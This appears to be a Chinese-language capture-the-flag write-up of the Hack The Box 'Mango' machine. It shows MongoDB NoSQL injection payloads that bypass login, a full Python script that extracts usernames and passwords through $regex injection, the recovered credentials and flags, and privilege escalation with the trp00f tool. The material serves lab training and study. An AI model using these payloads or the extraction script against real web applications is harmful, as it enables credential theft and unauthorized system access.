[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…

2024-08-16 185 0

信息收集

IP Address Opening Ports
10.10.10.162 TCP:22,80,443

$ nmap -p- 10.10.10.162 --min-rate 1000 -sC -sV

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Mango | Search Base
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

MongoDB 注入

# echo '10.10.10.162 mango.htb staging-order.mango.htb'>>/etc/hosts

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图

staging-order.mango.htb

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图1

注入引号不会返回错误或改变响应。由于网站运行的是 PHP,我们可以尝试通过类型转换绕过认证。这可以通过在请求参数中添加 [] 来实现,使 PHP 将这些参数作为数组处理。如果存在某种弱比较,这将绕过认证。

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图2

然而,这次尝试也失败了。接下来,我们可以尝试 NoSQL 注入攻击,比如 MongoDB 认证绕过。MongoDB 使用 $ne(不等于)运算符来比较值。这个运算符可以通过数组语法传递给 PHP,最终注入到 MongoDB 查询中。

示例:

db.users.find({ username: "admin", password: "admin" });

注入payload为

db.users.find({ username: "admin", password: {$ne:"admin"} });

username=admin&password[$ne]=admin&login=login

重定向到home.php页面

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图3

由于首页没有返回任何有用的信息,我们可以尝试使用 MongoDB 的 $regex运算符从数据库中提取数据。$regex运算符允许通过正则表达式来查找数据。例如,以下查询将搜索匹配正则表达式 a.* 的用户名,这个正则表达式匹配任何包含字母 a 的用户名:

db.users.find({username: { $regex : "a.*", password: { $ne : "admin" } });

username[$regex]=a.*&password[$ne]=admin&login=login

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图4

username[$regex]=1.*&password[$ne]=admin&login=login

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图5

# exp.py
# @Maptnh
import re
from requests import post
from string import ascii_lowercase, ascii_uppercase, digits, punctuation

url = 'http://staging-order.mango.htb/'

class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def get_characters():
    """Identify potential username and password characters."""
    charset = ascii_lowercase + ascii_uppercase + digits
    found_chars = []

    for char in charset:
        response = post(url, data={
            'username[$regex]': f'^{char}.*',
            'password[$ne]': 'password',
            'login': 'login'
        }, allow_redirects=False)
        if response.status_code == 302:
            found_chars.append(char)
            print(f"{Colors.OKGREEN}[+] Found character: {char}{Colors.ENDC}")

    return found_chars

def build_usernames(chars):
    """Build usernames from identified characters."""
    print(f"{Colors.WARNING}[*] Building usernames...{Colors.ENDC}")
    charset = ascii_lowercase + ascii_uppercase + digits
    usernames = []

    for char in chars:
        username = char
        while True:
            found_char = False
            for next_char in charset:
                regex = f'^{username + next_char}.*'
                response = post(url, data={
                    'username[$regex]': regex,
                    'password[$ne]': 'password',
                    'login': 'login'
                }, allow_redirects=False)
                if response.status_code == 302:
                    username += next_char
                    found_char = True
                    print(f"{Colors.OKGREEN}[+] Found character '{next_char}' for username: {username}{Colors.ENDC}")
                    break

            if not found_char:
                break
        
        usernames.append(username)
        print(f"{Colors.OKGREEN}[+] Found username: {username}{Colors.ENDC}")

    return usernames

def escape_special_characters(s):
    """Escape special characters in the string for regex."""
    return re.escape(s)

def find_passwords(usernames):
    """Attempt to find passwords for each identified username."""
    print(f"{Colors.WARNING}[*] Finding passwords for users...{Colors.ENDC}")
    charset = ascii_lowercase + ascii_uppercase + digits + punctuation
    results = []

    for user in usernames:
        password = ''
        while True:
            found_char = False
            for char in charset:
                escaped_password = escape_special_characters(password + char)
                response = post(url, data={
                    'username': user,
                    'password[$regex]': f'^{escaped_password}.*',
                    'login': 'login'
                }, allow_redirects=False)
                if response.status_code == 302:
                    password += char
                    found_char = True
                    print(f"{Colors.OKGREEN}[+] Found character '{char}' for password: {password}{Colors.ENDC}")
                    break

            if not found_char:
                break

        results.append((user, password))
        print(f"{Colors.OKGREEN}[+] Password found for user {user}: {password}{Colors.ENDC}")

    return results

def print_results(results):
    """Print the results in a table format."""
    print(f"{Colors.HEADER}\n[+] Final results:{Colors.ENDC}")
    print(f"{Colors.BOLD}{'Username':<20} {'Password':<20}{Colors.ENDC}")
    print(f"{'='*40}")
    for user, password in results:
        print(f"{user:<20} {password:<20}")

if __name__ == '__main__':
    chars = get_characters()
    usernames = build_usernames(chars)
    results = find_passwords(usernames)
    print_results(results)

$ python3 exp.py

Username             Password            
========================================
admin                t9KcS3>!0B#2        
mango                h3mXK8RhU~f{]f5H   

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图6

$ ssh [email protected]

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图7

$ su admin

User.txt

6fcde02686f818d7a13592d510c4867f

权限提升

JJS 权限提升 & TRP00F 权限提升

https://github.com/MartinxMax/trp00f

通过jjs权限提升

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

[!] Do you want to exploit the vulnerability in file jjs? (y/n) >y

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >n

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图8

也可以通过TRP00F其他的权限提升插件来直接获取ROOT权限

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

[!] Do you want to exploit the vulnerability in file jjs? (y/n) >n

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP0…插图9

Root.txt

110c3bcc1eb4a29e3da9c2e1d372c50d


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论